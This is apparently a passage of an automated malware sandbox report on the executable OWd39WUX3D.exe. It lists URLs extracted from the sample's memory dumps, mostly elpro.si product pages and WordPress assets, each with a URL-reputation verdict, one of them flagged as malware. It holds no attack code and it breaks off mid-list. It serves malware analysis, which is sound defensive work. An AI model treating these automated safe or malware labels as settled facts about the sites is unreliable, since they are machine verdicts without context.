                                                                                                                                                        https://www.elpro.si/avtorji/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.0OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?verOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=MediterranOWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://pohlfood.com/comments/feed/OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.com-sit.com/testhouse/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerjiOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moniOWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.aevga.com/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.382180888.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.myropcb.com/services-capabilities/pcb-restoration/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 